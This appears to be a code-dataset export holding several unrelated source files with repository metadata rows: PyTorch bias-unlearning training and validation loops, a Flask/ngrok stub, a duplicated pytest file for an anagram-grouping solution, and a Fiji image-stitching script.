    pseudo auxiliary loss scaled by args.lambdaa; (2) auxiliary head on the
    bias labels, optionally through gradient reversal (args.GRL).

    Returns:
        (train_loss, train_loss_aux): per-batch main and auxiliary losses.
    """
    # setting models to train mode
    model_encoder.train()
    model_classifier.train()
    model_aux.train()
    # empty lists for training loss and auxiliary training loss
    train_loss = []
    train_loss_aux = []
    # adding progress bar for easier monitoring during training
    bar = tqdm(loader)
    for (data, target, target_aux, target_aux2) in bar:
        if args.rulers:  # switching to ruler labels as the bias target
            target_aux = target_aux2
        # zeroing gradients
        optimizer.zero_grad()
        optimizer_aux.zero_grad()
        # sending data and targets to GPU
        data, target, target_aux = data.to(device), target.to(device), target_aux.to(device)
        # predicting with model and getting feature maps and logits
        feat_out = model_encoder(data)  # creating feature representation using the encoder
        logits = model_classifier(feat_out)  # using the main classifier to get output logits
        target = target.unsqueeze(1).type_as(logits)  # unsqueezing to [batch_size, 1] and same dtype as logits
        # ######----------------Main Head & Pseudo Loss---------------###########
        # taking pseudo prediction from output of auxiliary head (output of softmax)
        _, pseudo_pred_aux = model_aux(feat_out)
        # loss for main prediction calculated from the logits output
        loss_main = criterion(logits, target)
        # pseudo auxiliary loss: negative entropy of the auxiliary softmax output
        loss_pseudo_aux = torch.mean(torch.sum(pseudo_pred_aux * torch.log(pseudo_pred_aux), 1))
        # pseudo auxiliary loss multiplied by lambda and added to main prediction loss
        loss = loss_main + loss_pseudo_aux * args.lambdaa
        # backpropagation to calculate gradients
        loss.backward()
        # updating weights
        optimizer.step()
        # ######-------------Auxiliary Head Classifier Update------------###########
        # zeroing gradients from last step
        optimizer.zero_grad()
        optimizer_aux.zero_grad()
        # predicting with model and getting feature maps and logits
        feat_out = model_encoder(data)  # creating feature representation using the encoder
        # applying gradient reversal to outputted features of main network
        if args.GRL:
            feat_out = grad_reverse(feat_out)
        # getting logits from auxiliary head output (gradient reversal applied ready for updating)
        logits_aux, _ = model_aux(feat_out)
        # calculating auxiliary loss
        loss_aux = criterion_aux(logits_aux, target_aux)
        # backpropagating to calculate gradients (reversed where GRL is enabled)
        loss_aux.backward()
        # updating weights (encoder and auxiliary head)
        optimizer.step()
        optimizer_aux.step()
        # sending losses to cpu for printing
        loss_np = loss.detach().cpu().numpy()
        loss_aux_np = loss_aux.detach().cpu().numpy()
        # appending losses to lists
        train_loss.append(loss_np)
        train_loss_aux.append(loss_aux_np)
        # calculating smooth losses over (at most) the last 100 batches
        smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100)
        smooth_loss_aux = sum(train_loss_aux[-100:]) / min(len(train_loss_aux), 100)
        bar.set_description('loss: %.5f, smth: %.5f, aux_loss: %.5f, aux_smth: %.5f' %
                            (loss_np, smooth_loss, loss_aux_np, smooth_loss_aux,))
    return train_loss, train_loss_aux
# Defining one training epoch for learning not to learn
def train_epoch_TABE(model_encoder, model_classifier, model_aux, loader, optimizer, optimizer_aux,
                     optimizer_confusion, criterion, criterion_aux):
    """Run one 'Turning a Blind Eye' (TABE) training epoch.

    Two alternating updates per batch: (1) main head plus a confusion loss
    (KL to a uniform distribution over the auxiliary head output, scaled by
    args.alpha); (2) auxiliary head on the bias labels, optionally through
    gradient reversal (args.GRL).

    Returns:
        (train_loss, train_loss_aux): per-batch main and auxiliary losses.
    """
    # setting models to train mode
    model_encoder.train()
    model_classifier.train()
    model_aux.train()
    # empty lists for training loss and auxiliary training loss
    train_loss = []
    train_loss_aux = []
    # adding progress bar for easier monitoring during training
    bar = tqdm(loader)
    for (data, target, target_aux, target_aux2) in bar:
        if args.rulers:  # switching targets round if wanting to use rulers as target
            target_aux = target_aux2
        # zeroing gradients
        optimizer.zero_grad()
        optimizer_aux.zero_grad()
        optimizer_confusion.zero_grad()
        # sending data and targets to the device
        data, target, target_aux = data.to(device), target.to(device), target_aux.to(device)
        # predicting with model and getting feature maps and logits
        feat_out = model_encoder(data)  # creating feature representation using the encoder
        logits = model_classifier(feat_out)  # using the main classifier to get output logits
        target = target.unsqueeze(1).type_as(logits)  # unsqueezing to [batch_size, 1] and same dtype as logits
        # ######----------------Main Head & Confusion Loss---------------###########
        loss_main = criterion(logits, target)  # main classification loss (sigmoid built into BCEWithLogitsLoss)
        _, output_conf = model_aux(feat_out)  # getting probabilities from auxiliary head
        # defining uniform distribution for calculating KL divergence for confusion loss
        uni_distrib = torch.FloatTensor(output_conf.size()).uniform_(0, 1)
        uni_distrib = uni_distrib.to(device)  # sending to GPU
        uni_distrib = Variable(uni_distrib)
        loss_conf = - args.alpha * (torch.sum(uni_distrib * torch.log(output_conf))) / float(output_conf.size(0))  # calculating confusion loss
        loss = loss_main + loss_conf  # adding main and confusion losses
        # backpropagation to calculate gradients
        loss.backward()
        # updating weights
        optimizer.step()
        optimizer_confusion.step()
        # ######-------------------------------Auxiliary Head Classifier Update-------------------------------###########
        # zeroing gradients from last step
        optimizer.zero_grad()
        optimizer_aux.zero_grad()
        # predicting with model and getting feature maps and logits
        feat_out = model_encoder(data)  # creating feature representation using the encoder
        # applying gradient reversal to outputted features of main network
        if args.GRL:
            feat_out = grad_reverse(feat_out)
        # getting logits from auxiliary head output (gradient reversal applied ready for updating)
        logits_aux, _ = model_aux(feat_out)
        # calculating auxiliary loss
        loss_aux = criterion_aux(logits_aux, target_aux)
        # backpropagating to calculate gradients (reversed where GRL is enabled)
        loss_aux.backward()
        # updating weights (encoder and auxiliary head)
        optimizer.step()
        optimizer_aux.step()
        # sending losses to cpu for printing
        loss_np = loss.detach().cpu().numpy()
        loss_aux_np = loss_aux.detach().cpu().numpy()
        # appending losses to lists
        train_loss.append(loss_np)
        train_loss_aux.append(loss_aux_np)
        # calculating smooth losses over (at most) the last 100 batches
        smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100)
        smooth_loss_aux = sum(train_loss_aux[-100:]) / min(len(train_loss_aux), 100)
        bar.set_description('loss: %.5f, smth: %.5f, aux_loss: %.5f, aux_smth: %.5f' %
                            (loss_np, smooth_loss, loss_aux_np, smooth_loss_aux,))
    return train_loss, train_loss_aux
# Defining one training epoch for learning not to learn
def train_epoch_doubleTABE(model_encoder, model_classifier, model_aux, model_aux2, loader, optimizer, optimizer_aux,
                           optimizer_aux2, optimizer_confusion, criterion, criterion_aux, criterion_aux2):
    """Run one TABE training epoch with TWO auxiliary (bias) heads.

    Same two-phase scheme as `train_epoch_TABE`, except a confusion loss is
    computed against each auxiliary head, and both heads are updated in the
    second phase using their own optimizers and criteria.

    Returns:
        (train_loss, train_loss_aux, train_loss_aux2): per-batch main and
        per-head auxiliary losses.
    """
    # setting models to train mode
    model_encoder.train()
    model_classifier.train()
    model_aux.train()
    model_aux2.train()
    # empty lists for training loss and auxiliary training losses
    train_loss = []
    train_loss_aux = []
    train_loss_aux2 = []
    # adding progress bar for easier monitoring during training
    bar = tqdm(loader)
    for (data, target, target_aux, target_aux2) in bar:
        # zeroing gradients
        optimizer.zero_grad()
        optimizer_aux.zero_grad()
        optimizer_aux2.zero_grad()
        optimizer_confusion.zero_grad()
        # sending data and targets to the device
        data, target, target_aux, target_aux2 = data.to(device), target.to(device), target_aux.to(device), target_aux2.to(device)
        # predicting with model and getting feature maps and logits
        feat_out = model_encoder(data)  # creating feature representation using the encoder
        logits = model_classifier(feat_out)  # using the main classifier to get output logits
        target = target.unsqueeze(1).type_as(logits)  # unsqueezing to [batch_size, 1] and same dtype as logits
        # ######----------------Main Head & Confusion Loss---------------###########
        loss_main = criterion(logits, target)  # main classification loss (sigmoid built into BCEWithLogitsLoss)
        _, output_conf = model_aux(feat_out)  # getting probabilities from first auxiliary head
        _, output_conf2 = model_aux2(feat_out)  # getting probabilities from second auxiliary head
        # defining uniform distribution for calculating KL divergence for confusion loss
        uni_distrib = torch.FloatTensor(output_conf.size()).uniform_(0, 1)
        uni_distrib = uni_distrib.to(device)  # sending to GPU
        uni_distrib = Variable(uni_distrib)
        loss_conf = - args.alpha * (torch.sum(uni_distrib * torch.log(output_conf))) / float(output_conf.size(0))  # calculating confusion loss
        uni_distrib2 = torch.FloatTensor(output_conf2.size()).uniform_(0, 1)
        uni_distrib2 = uni_distrib2.to(device)  # sending to GPU
        uni_distrib2 = Variable(uni_distrib2)
        loss_conf2 = - args.alpha * (torch.sum(uni_distrib2 * torch.log(output_conf2))) / float(output_conf2.size(0))  # calculating confusion loss
        loss = loss_main + loss_conf + loss_conf2  # adding main and both confusion losses
        # backpropagation to calculate gradients
        loss.backward()
        # updating weights
        optimizer.step()
        optimizer_confusion.step()
        # ######-------------------------------Auxiliary Head Classifier Update-------------------------------###########
        # zeroing gradients from last step
        optimizer.zero_grad()
        optimizer_aux.zero_grad()
        optimizer_aux2.zero_grad()
        # predicting with model and getting feature maps and logits
        feat_out = model_encoder(data)  # creating feature representation using the encoder
        # applying gradient reversal to outputted features of main network
        if args.GRL:
            feat_out = grad_reverse(feat_out)
        # getting logits from auxiliary head outputs (gradient reversal applied ready for updating)
        logits_aux, _ = model_aux(feat_out)
        logits_aux2, _ = model_aux2(feat_out)
        # calculating auxiliary losses for both heads
        loss_aux = criterion_aux(logits_aux, target_aux)
        loss_aux2 = criterion_aux2(logits_aux2, target_aux2)
        aux_losses = loss_aux + loss_aux2
        # backpropagating to calculate gradients
        aux_losses.backward()
        # updating weights (encoder and both auxiliary heads)
        optimizer.step()
        optimizer_aux.step()
        optimizer_aux2.step()
        # sending losses to cpu for printing
        loss_np = loss.detach().cpu().numpy()
        loss_aux_np = loss_aux.detach().cpu().numpy()  # sending loss to cpu
        loss_aux2_np = loss_aux2.detach().cpu().numpy()  # sending loss to cpu
        # ------------------------------------------------------------------
        # appending losses to loss lists
        train_loss.append(loss_np)
        train_loss_aux.append(loss_aux_np)
        train_loss_aux2.append(loss_aux2_np)
        # calculating smooth losses over (at most) the last 100 batches
        smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100)
        smooth_loss_aux = sum(train_loss_aux[-100:]) / min(len(train_loss_aux), 100)
        smooth_loss_aux2 = sum(train_loss_aux2[-100:]) / min(len(train_loss_aux2), 100)
        # metrics to be displayed with progress bar
        bar.set_description(
            'loss: %.5f, smth: %.5f, aux_loss: %.5f, aux_loss2: %.5f, aux_smth: %.5f, aux_smth2: %.5f' %
            (loss_np, smooth_loss, loss_aux_np, loss_aux2_np, smooth_loss_aux, smooth_loss_aux2))
    return train_loss, train_loss_aux, train_loss_aux2
# Defining one training epoch for learning not to learn
def train_epoch_BOTH(model_encoder, model_classifier, model_aux, model_aux2, loader, optimizer, optimizer_aux,
                     optimizer_aux2, optimizer_confusion, criterion, criterion_aux, criterion_aux2):
    """Run one training epoch that combines a confusion loss with a pseudo (entropy-style) loss.

    Each batch performs two sequential updates:
      1. Main update: encoder + main classifier trained on
         loss_main + confusion loss + lambdaa-weighted pseudo loss
         (``optimizer`` and ``optimizer_confusion`` step).
      2. Auxiliary update: both auxiliary heads trained on their own
         losses, optionally through a gradient-reversal layer
         (``optimizer``, ``optimizer_aux`` and ``optimizer_aux2`` step).

    Args:
        model_encoder: backbone producing feature representations.
        model_classifier: main task head operating on encoder features.
        model_aux, model_aux2: auxiliary heads; each returns a
            (logits, probabilities) pair.
        loader: iterable yielding (data, target, target_aux_pre,
            target_aux2_pre) batches.
        optimizer, optimizer_aux, optimizer_aux2, optimizer_confusion:
            optimizers for the respective model components.
        criterion, criterion_aux, criterion_aux2: loss functions for the
            main and auxiliary heads.

    Returns:
        (train_loss, train_loss_aux, train_loss_aux2): lists of per-batch
        losses as numpy scalars, in batch order.
    """
    # setting models to train mode
    model_encoder.train()
    model_classifier.train()
    model_aux.train()
    model_aux2.train()
    # per-batch loss histories: main loss, aux head 1 loss, aux head 2 loss
    train_loss = []
    train_loss_aux = []
    train_loss_aux2 = []
    bar = tqdm(loader)  # using tqdm to show a progress bar
    for (data, target, target_aux_pre, target_aux2_pre) in bar:
        # clear gradients accumulated by the previous batch on every optimizer
        optimizer.zero_grad()
        optimizer_aux.zero_grad()
        optimizer_aux2.zero_grad()
        optimizer_confusion.zero_grad()
        if args.switch_heads:  # allowing the auxiliary heads to swap tasks by switching their labels
            target_aux = target_aux2_pre
            target_aux2 = target_aux_pre
        else:
            target_aux = target_aux_pre
            target_aux2 = target_aux2_pre
        data, target, target_aux, target_aux2 = data.to(device), target.to(device), target_aux.to(
            device), target_aux2.to(device)  # sending data and targets to the compute device
        # forward pass: features from the encoder, logits from the main classifier head
        feat_out = model_encoder(data)  # creating feature representation using the encoder
        logits = model_classifier(feat_out)  # using the main classifier to get output logits
        target = target.unsqueeze(1).type_as(logits)  # unsqueezing to [batch_size, 1] and matching logits dtype
        # ######---------Main Head & Confusion Loss & pseudo loss---------###########
        loss_main = criterion(logits, target)  # main task loss
        _, output_conf = model_aux(feat_out)  # probabilities from the first auxiliary head
        uni_distrib = torch.FloatTensor(output_conf.size()).uniform_(0, 1)  # random tensor drawn from U(0, 1)
        uni_distrib = uni_distrib.to(device)  # sending to the compute device
        uni_distrib = Variable(uni_distrib)  # NOTE(review): Variable is a no-op wrapper on modern PyTorch
        # confusion loss: cross-entropy of aux probabilities against the random
        # distribution, scaled by args.alpha and normalised by batch size
        loss_conf = - args.alpha * (torch.sum(uni_distrib * torch.log(output_conf))) / float(
            output_conf.size(0))
        # NOTE(review): second forward through model_aux with the same feat_out;
        # presumably intended to give a fresh graph for the pseudo term — confirm
        _, pseudo_pred_aux = model_aux(feat_out)
        loss_pseudo_aux = torch.mean(
            torch.sum(pseudo_pred_aux * torch.log(pseudo_pred_aux), 1))  # negative entropy of the aux prediction
        loss = loss_main + loss_conf + loss_pseudo_aux * args.lambdaa  # combined loss; lambdaa weights the pseudo term
        loss.backward()  # backpropagating combined loss to calculate gradients
        optimizer.step()  # updating main-model weights
        optimizer_confusion.step()
        # ######----------------Auxiliary Head Classifier Update----------------###########
        # zeroing gradients left over from the main update
        optimizer.zero_grad()
        optimizer_aux.zero_grad()
        optimizer_aux2.zero_grad()
        # fresh forward pass so the auxiliary losses get their own graph
        feat_out = model_encoder(data)  # creating feature representation using the encoder
        # optionally reverse gradients flowing from the auxiliary heads into the encoder
        if args.GRL:
            feat_out = grad_reverse(feat_out)
        # logits from both auxiliary heads (gradient reversal already applied if enabled)
        logits_aux, _ = model_aux(feat_out)
        logits_aux2, _ = model_aux2(feat_out)
        # calculating auxiliary losses; when heads are switched the criteria swap to follow their labels
        if args.switch_heads:
            loss_aux = criterion_aux2(logits_aux, target_aux)  # calculating auxiliary loss
            loss_aux2 = criterion_aux(logits_aux2, target_aux2)  # calculating 2nd auxiliary loss
        else:
            loss_aux = criterion_aux(logits_aux, target_aux)  # calculating auxiliary loss
            loss_aux2 = criterion_aux2(logits_aux2, target_aux2)  # calculating 2nd auxiliary loss
        aux_losses = loss_aux + loss_aux2
        # backpropagating summed auxiliary losses to calculate gradients
        aux_losses.backward()
        # updating encoder and both auxiliary heads
        optimizer.step()
        optimizer_aux.step()
        optimizer_aux2.step()
        # detaching losses to CPU numpy scalars for logging
        loss_np = loss.detach().cpu().numpy()
        loss_aux_np = loss_aux.detach().cpu().numpy()  # sending loss to cpu
        loss_aux2_np = loss_aux2.detach().cpu().numpy()  # sending loss to cpu
        # ------------------------------------------------------------------
        # recording per-batch losses
        train_loss.append(loss_np)
        train_loss_aux.append(loss_aux_np)
        train_loss_aux2.append(loss_aux2_np)
        # running means over the most recent 100 batches
        smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100)
        smooth_loss_aux = sum(train_loss_aux[-100:]) / min(len(train_loss_aux), 100)
        smooth_loss_aux2 = sum(train_loss_aux2[-100:]) / min(len(train_loss_aux2), 100)
        # metrics displayed with the progress bar
        bar.set_description(
            'loss: %.5f, smth: %.5f, aux_loss: %.5f, aux_loss2: %.5f, aux_smth: %.5f, aux_smth2: %.5f' % (
                loss_np, smooth_loss, loss_aux_np, loss_aux2_np, smooth_loss_aux, smooth_loss_aux2))
    return train_loss, train_loss_aux, train_loss_aux2
# Defining one training epoch for learning not to learn
def train_epoch_doubleLNTL(model_encoder, model_classifier, model_aux, model_aux2, loader, optimizer, optimizer_aux,
                           optimizer_aux2, criterion, criterion_aux, criterion_aux2):
    """Run one "learning not to learn" training epoch with two auxiliary heads.

    Each batch performs two sequential updates:
      1. Main update: encoder + main classifier trained on
         loss_main + lambdaa-weighted pseudo (negative-entropy) losses of
         both auxiliary heads (``optimizer`` steps).
      2. Auxiliary update: both auxiliary heads trained on their own
         losses, optionally through a gradient-reversal layer
         (``optimizer``, ``optimizer_aux`` and ``optimizer_aux2`` step).

    Args:
        model_encoder: backbone producing feature representations.
        model_classifier: main task head operating on encoder features.
        model_aux, model_aux2: auxiliary heads; each returns a
            (logits, probabilities) pair.
        loader: iterable yielding (data, target, target_aux, target_aux2) batches.
        optimizer, optimizer_aux, optimizer_aux2: optimizers for the
            respective model components.
        criterion, criterion_aux, criterion_aux2: loss functions for the
            main and auxiliary heads.

    Returns:
        (train_loss, train_loss_aux, train_loss_aux2): lists of per-batch
        losses as numpy scalars, in batch order.
    """
    # setting models to train mode
    model_encoder.train()
    model_classifier.train()
    model_aux.train()
    model_aux2.train()
    # per-batch loss histories: main loss, aux head 1 loss, aux head 2 loss
    train_loss = []
    train_loss_aux = []
    train_loss_aux2 = []
    bar = tqdm(loader)  # using tqdm to show a progress bar
    for (data, target, target_aux, target_aux2) in bar:
        # clear gradients accumulated by the previous batch on every optimizer
        optimizer.zero_grad()
        optimizer_aux.zero_grad()
        optimizer_aux2.zero_grad()
        data, target, target_aux, target_aux2 = data.to(device), target.to(device), target_aux.to(
            device), target_aux2.to(device)  # sending data and targets to the compute device
        # forward pass: features from the encoder, logits from the main classifier head
        feat_out = model_encoder(data)  # creating feature representation using the encoder
        logits = model_classifier(feat_out)  # using the main classifier to get output logits
        target = target.unsqueeze(1).type_as(logits)  # unsqueezing to [batch_size, 1] and matching logits dtype
        # ######----------------Main Head & Pseudo Losses---------------###########
        loss_main = criterion(logits, target)  # main task loss
        _, pseudo_pred_aux = model_aux(feat_out)  # pseudo prediction from the first auxiliary head
        loss_pseudo_aux = torch.mean(
            torch.sum(pseudo_pred_aux * torch.log(pseudo_pred_aux), 1))  # negative entropy of aux head 1's prediction
        _, pseudo_pred_aux2 = model_aux2(feat_out)  # pseudo prediction from the second auxiliary head
        loss_pseudo_aux2 = torch.mean(
            torch.sum(pseudo_pred_aux2 * torch.log(pseudo_pred_aux2), 1))  # negative entropy of aux head 2's prediction
        loss = loss_main + (loss_pseudo_aux + loss_pseudo_aux2)*args.lambdaa  # combined loss; lambdaa weights the pseudo terms
        loss.backward()  # backpropagating loss to calculate gradients
        optimizer.step()  # updating main-model weights
        # ######-------------Auxiliary Head Classifier Update------------###########
        # zeroing gradients left over from the main update
        optimizer.zero_grad()
        optimizer_aux.zero_grad()
        optimizer_aux2.zero_grad()
        # fresh forward pass so the auxiliary losses get their own graph
        feat_out = model_encoder(data)  # creating feature representation using the encoder
        # optionally reverse gradients flowing from the auxiliary heads into the encoder
        if args.GRL:
            feat_out = grad_reverse(feat_out)
        # logits from both auxiliary heads (gradient reversal already applied if enabled)
        logits_aux, _ = model_aux(feat_out)
        logits_aux2, _ = model_aux2(feat_out)
        # calculating auxiliary losses
        loss_aux = criterion_aux(logits_aux, target_aux)  # calculating auxiliary loss
        loss_aux2 = criterion_aux2(logits_aux2, target_aux2)  # calculating 2nd auxiliary loss
        aux_losses = loss_aux + loss_aux2
        # backpropagating summed auxiliary losses to calculate gradients
        aux_losses.backward()
        # updating encoder and both auxiliary heads
        optimizer.step()
        optimizer_aux.step()
        optimizer_aux2.step()
        # detaching losses to CPU numpy scalars for logging
        loss_np = loss.detach().cpu().numpy()
        loss_aux_np = loss_aux.detach().cpu().numpy()  # sending loss to cpu
        loss_aux2_np = loss_aux2.detach().cpu().numpy()  # sending loss to cpu
        # ------------------------------------------------------------------
        # recording per-batch losses
        train_loss.append(loss_np)
        train_loss_aux.append(loss_aux_np)
        train_loss_aux2.append(loss_aux2_np)
        # running means over the most recent 100 batches
        smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100)
        smooth_loss_aux = sum(train_loss_aux[-100:]) / min(len(train_loss_aux), 100)
        smooth_loss_aux2 = sum(train_loss_aux2[-100:]) / min(len(train_loss_aux2), 100)
        # metrics displayed with the progress bar
        bar.set_description(
            'loss: %.5f, smth: %.5f, aux_loss: %.5f, aux_loss2: %.5f, aux_smth: %.5f, aux_smth2: %.5f' % (
                loss_np, smooth_loss, loss_aux_np, loss_aux2_np, smooth_loss_aux, smooth_loss_aux2))
    return train_loss, train_loss_aux, train_loss_aux2
# translations for testing (test-time augmentation)
def get_trans(img, I):
    """Return the I-th test-time-augmentation view of a 4D image batch.

    Views 0-3 are: identity, vertical flip (dim 2), horizontal flip (dim 3),
    and both flips. For I >= 4 the spatial dims are transposed first, giving
    the same four variants of the transposed image (8 views total).
    """
    if I >= 4:
        img = img.transpose(2, 3)
    mode = I % 4
    if mode == 0:
        return img
    if mode == 1:
        return img.flip(2)
    if mode == 2:
        return img.flip(3)
    return img.flip(2).flip(3)
def val_epoch(model_encoder, model_classifier, loader, criterion, n_test=1, get_output=False):
    """Evaluate the encoder + main classifier over one pass of ``loader``.

    Averages logits and sigmoid probabilities over ``n_test`` test-time
    augmentations (see ``get_trans``) before computing the loss.

    Returns:
        (PROBS, TARGETS) numpy arrays when ``get_output`` is True;
        otherwise (val_loss, acc, auc) where acc uses a 0.5 threshold.
    """
    # evaluation mode: disables dropout / uses running batch-norm stats
    model_encoder.eval()
    model_classifier.eval()
    batch_losses = []
    all_logits, all_probs, all_targets = [], [], []
    with torch.no_grad():
        for (data, target, _, _) in tqdm(loader):  # tqdm for a progress bar
            data, target = data.to(device), target.to(device)  # move batch to the compute device
            # accumulators for logits/probabilities across augmented views
            summed_logits = torch.zeros((data.shape[0], args.out_dim)).to(device)
            summed_probs = torch.zeros((data.shape[0], args.out_dim)).to(device)
            # evaluate each augmented view and sum the outputs for consensus
            for view_idx in range(n_test):
                feats = model_encoder(get_trans(data, view_idx))  # encoder features for this view
                view_logits = model_classifier(feats)  # main-head logits for this view
                summed_logits += view_logits
                summed_probs += torch.sigmoid(view_logits)
            # average over the number of views
            summed_logits /= n_test
            summed_probs /= n_test
            # stash batch results on the CPU
            all_logits.append(summed_logits.detach().cpu())
            all_probs.append(summed_probs.detach().cpu())
            all_targets.append(target.detach().cpu())
            # reshape target to [batch_size, 1] with the logits dtype for the criterion
            target = target.unsqueeze(1).type_as(summed_logits)
            batch_losses.append(criterion(summed_logits, target).detach().cpu().numpy())
    val_loss = np.mean(batch_losses)  # overall validation loss
    # concatenate per-batch results into flat numpy arrays
    LOGITS = torch.cat(all_logits).numpy()
    PROBS = torch.cat(all_probs).numpy()
    TARGETS = torch.cat(all_targets).numpy()
    if get_output:
        return PROBS, TARGETS
    acc = accuracy_score(TARGETS, np.round(PROBS))  # accuracy at the 0.5 threshold
    auc = roc_auc_score(TARGETS, PROBS)  # area under the ROC curve
    return val_loss, acc, auc
| 45.713831
| 147
| 0.661647
| 3,613
| 28,754
| 5.053141
| 0.078328
| 0.034507
| 0.016432
| 0.010736
| 0.825108
| 0.803418
| 0.79312
| 0.779537
| 0.76913
| 0.760037
| 0
| 0.014807
| 0.234333
| 28,754
| 628
| 148
| 45.786624
| 0.814453
| 0.339153
| 0
| 0.70801
| 0
| 0.007752
| 0.026388
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.020672
| 0
| 0.077519
| 0.005168
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dca02df300625c5289bb0f79e466f7a82544c5bb
| 93
|
py
|
Python
|
Subham Kumar Sahoo webapp/webapp.py
|
sksgit7/DigitalOcean
|
6aa3a4b2cf52e1c54f51b2edf096ed839825a01b
|
[
"MIT"
] | 14
|
2020-06-04T09:44:28.000Z
|
2020-09-30T12:08:02.000Z
|
Subham Kumar Sahoo webapp/webapp.py
|
sksgit7/DigitalOcean
|
6aa3a4b2cf52e1c54f51b2edf096ed839825a01b
|
[
"MIT"
] | 2
|
2020-06-05T16:43:09.000Z
|
2020-06-05T18:50:52.000Z
|
Subham Kumar Sahoo webapp/webapp.py
|
sksgit7/DigitalOcean
|
6aa3a4b2cf52e1c54f51b2edf096ed839825a01b
|
[
"MIT"
] | 3
|
2020-06-05T10:36:44.000Z
|
2020-06-06T06:21:23.000Z
|
from app import app
from flask_ngrok import run_with_ngrok
# run_with_ngrok(app)
# app.run()
| 18.6
| 38
| 0.795699
| 17
| 93
| 4.058824
| 0.411765
| 0.202899
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 93
| 5
| 39
| 18.6
| 0.851852
| 0.311828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f4abfd280998b5d570887861b9a00bb2a8f022a2
| 1,592
|
py
|
Python
|
tests/test_49.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_49.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_49.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 49. Group Anagrams
"""
@pytest.fixture(scope="session")
def init_variables_49():
from src.leetcode_49_group_anagrams import Solution
solution = Solution()
def _init_variables_49():
return solution
yield _init_variables_49
class TestClass49:
def test_solution_0(self, init_variables_49):
assert init_variables_49().groupAnagrams(["eat", "tea", "tan", "ate", "nat", "bat"]) == [
["bat"],
["nat", "tan"],
["ate", "eat", "tea"],
]
def test_solution_1(self, init_variables_49):
assert init_variables_49().groupAnagrams([""]) == [[""]]
def test_solution_2(self, init_variables_49):
assert init_variables_49().groupAnagrams(["a"]) == [["a"]]
#!/usr/bin/env python
import pytest
"""
Test 49. Group Anagrams
"""
@pytest.fixture(scope="session")
def init_variables_49():
from src.leetcode_49_group_anagrams import Solution
solution = Solution()
def _init_variables_49():
return solution
yield _init_variables_49
class TestClass49:
def test_solution_0(self, init_variables_49):
assert init_variables_49().groupAnagrams(["eat", "tea", "tan", "ate", "nat", "bat"]) == [
["bat"],
["nat", "tan"],
["ate", "eat", "tea"],
]
def test_solution_1(self, init_variables_49):
assert init_variables_49().groupAnagrams([""]) == [[""]]
def test_solution_2(self, init_variables_49):
assert init_variables_49().groupAnagrams(["a"]) == [["a"]]
| 22.422535
| 97
| 0.616834
| 186
| 1,592
| 4.967742
| 0.198925
| 0.253247
| 0.292208
| 0.123377
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.043619
| 0.222362
| 1,592
| 70
| 98
| 22.742857
| 0.702746
| 0.025126
| 0
| 0.947368
| 0
| 0
| 0.060484
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.263158
| false
| 0
| 0.105263
| 0.052632
| 0.473684
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
76263d71daf2034cfc92e0962e0fa9094679ad0f
| 1,411
|
py
|
Python
|
snippets/reg_and_stitching/stitch.py
|
michielkleinnijenhuis/EM
|
f46a9b11298919b359e80d9f23a7e824df1356cb
|
[
"Apache-2.0"
] | null | null | null |
snippets/reg_and_stitching/stitch.py
|
michielkleinnijenhuis/EM
|
f46a9b11298919b359e80d9f23a7e824df1356cb
|
[
"Apache-2.0"
] | null | null | null |
snippets/reg_and_stitching/stitch.py
|
michielkleinnijenhuis/EM
|
f46a9b11298919b359e80d9f23a7e824df1356cb
|
[
"Apache-2.0"
] | null | null | null |
from ij import IJ
inputdir = '/Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/tifs'
outputdir = '/Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/stitched/'
n_slices = 2
for slc in range(0, n_slices):
IJ.run("Grid/Collection stitching", "type=[Grid: row-by-row] order=[Right & Down ] grid_size_x=2 grid_size_y=2 tile_overlap=10 first_file_index_i=0 directory=/Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/tifs file_names=0001_m{iii}.tif output_textfile_name=TileConfiguration.txt fusion_method=[Linear Blending] regression_threshold=0.30 max/avg_displacement_threshold=2.50 absolute_displacement_threshold=3.50 compute_overlap subpixel_accuracy computation_parameters=[Save memory (but be slower)] image_output=[Fuse and display]");
IJ.saveAs("Tiff", "/Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/0001_fused.tif");
#
